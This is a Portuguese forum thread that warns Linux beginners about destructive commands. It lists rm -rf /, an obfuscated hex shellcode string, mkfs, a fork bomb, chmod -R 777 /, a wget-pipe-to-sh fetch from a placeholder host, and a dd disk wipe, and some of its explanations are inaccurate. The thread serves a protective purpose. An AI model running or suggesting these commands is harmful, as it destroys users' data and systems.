Comandos para “acabar” com o Linux

Iniciado por Álvaro Anjos, 24 de Novembro de 2008, 21:30

tópico anterior - próximo tópico

Álvaro Anjos

Andava eu a procurar novidades curiosas na Internet, quando descobri comandos que quando usados no Linux, podem ser "mortais" para esse sistema.

Apesar de ser um utilizador com poucos conhecimentos em Linux, penso que é interessante saberem estes códigos, sobretudo se pedirem ajuda num fórum e alguém mal intencionado sugerir alguns dos códigos que vos deixo.

Tenham em atenção os seguintes códigos:

rm -rf /

Este comando eliminará toda a informação do directório Root.

- char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
"\x6e\x2f\x73\x68\x00\x2d\x63\x00″
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


Este comando faz precisamente o mesmo do primeiro, a única diferença consiste no facto de ser mais discreto. Mesmo os utilizadores mais habituados ao sistema Linux, podem não reconhecer o comando.

- mkfs.ext3 /dev/das

Este comando irá eliminar ou reformatar toda a informação existente no dispositivo indicado após o comando mkfs.

-:(){ :|:& };:

Este comando leva o sistema ao limite. Mais conhecido por "forkbomb" este comando indica ao sistema que efectue o maior número de processos até que o sistema crash. Além de todos os constrangimentos causados por este comando, pode também causar danos ao corromper a informação.

- chmod -R 777 /

Este comando permite a um outro utilizador ter privilégios de ler, escrever e executar ("Read, Write, Execute"). Os únicos ficheiros que "escapam" a este comando, são os ficheiros "/bin" e "/etc/bin" pois encontram-se em processamento.

- wget http://codigomalicioso -O- | sh

Este comando faz com que o sistema efectue um download de um código malicioso e o instale na sua máquina. Como é fácil de prever, tudo será possível acontecer a partir desse momento.

O último comando é o mais destrutivo de todos, pois faz com que o disco seja formatado e fique tal e qual como vem de fábrica.

- dd if=/dev/zero of=/dev/sda

Espero que com este artigo os menos experientes ou conhecedores dos sistemas Linux fiquem mais protegidos contra ataques.

RicardoSEP

Gostei do tópico muito interessante, mas você chegou a testar alguns desses comandos?

Tota

Que estes comandos funcionam é certeza, mas têm que ser executados como root.

Como usuário, não surtem efeito.

[],s

dom diniz

Citação de: Tota online 24 de Novembro de 2008, 22:06
Que estes comandos funcionam é certeza, mas têm que ser executados como root.

Como usuário, não surtem efeito.

[],s

Mas tem que ser root, root mesmo ou basta o sudo para que eles funcionem??

Pq se bastar o sudo já é ponto a menos no quesito segurança.
Preocupem-se com a criação de mais programas e não de mais distros.
link
Ga-945GM-S2Dual|Core 2 Duo E4600|2GB DDR2 Kingston667|Radeon X300 128|XP+ubuntu 10.04 || DELL Vostro 1310 + ubuntu 10.04

0tacon

 Álvaro, obrigado pela tradução. Você pegou isso do blog do Jun Auza, não foi?
E que eu saiba o comando rm -rf / não funciona no Ubuntu e em algumas outras distros porque há uma proteção contra isso. Ou não?


d3k

Cara, fiquei curioso pra ver o que acontece com esse "código malicioso"! Alguém aí se disponibiliza a executá-lo e gravar um vídeo pra gente ver? ;D (hauhauhau)
Blog | deviantART | Twitter | Flickr
"Pra que usar de tanta educação .. Pra destilar terceiras intenções"

Alakazan

PC é como ar-condicionado: é só abrir Windows que ele para de funcionar.
Tentando ser melhor - desculpem o incômodo!

agente100gelo

Citação de: deck.fox online 25 de Novembro de 2008, 01:21
Cara, fiquei curioso pra ver o que acontece com esse "código malicioso"! Alguém aí se disponibiliza a executá-lo e gravar um vídeo pra gente ver? ;D (hauhauhau)

Não seja por isso:
http://www.youtube.com/watch?v=D4fzInlyYQo
Advogado e analista de sistema cearense.
Twitter: @glaydson

paulo87

eu vi no launchpad esse aqui:

rm -rf /

ele já foi "arrumado", ou seja, não está mais tão facil de executa-lo.

Alakazan

Bacana esse vídeo...
Mas, se esses comandos destroem o sistema, porque els EXISTEM?
PC é como ar-condicionado: é só abrir Windows que ele para de funcionar.
Tentando ser melhor - desculpem o incômodo!

clcampos

#10
Citação de: Alakazan online 25 de Novembro de 2008, 18:25
Bacana esse vídeo...
Mas, se esses comandos destroem o sistema, porque els EXISTEM?

Evidente que não foram feitos para isso, e sim para outra coisa, mas acabam por ter essa possibilidade.

Eu particularmente não gosto de tópicos como esse, pois se para a grande maioria fica o aviso de que existe a possibilidade (o que é bom, pois evitasse possíveis problemas), ainda existe uma minoria que pode usar o que viu aqui para danificar a máquina dos outros (infelizmente o que ja ficamos sabendo que aconteceu ao menos no IRC).
Cristiano/Timóteo - MG
.: Como Fazer Perguntas de Forma Inteligente :.                
Com dúvida? pesquise!

ozin

hum.. interessante..
cara, será q se eu executar o comando:
- dd if=/dev/zero of=/dev/sda , mas trocando o "sda" pelo local do pendrive eu consigo formatar e zerar a mbr dele? pq eu apesar de só usar linux em casa, eu uso o janelas lá na facul (qndo não disponibilizam o laboratorio com linux, que por acaso é o ubuntu.. ^^) e essa porcaria já ficou com virus na MBR..
E pra não ferrar com outros pc's que tenham o janelas(voltemeia dou assistencia pra um janelas virulento), queria dexa ele novamente "de fábrica".
será q vira?
abraços..

serraemeira

Pq, vc não formata o pen drive criando nova particão, por exemplo: mude de fat16 para fat32. Isso irá reescrever a MBR não?
Usuário do Ubuntu Hardy Heron 8.04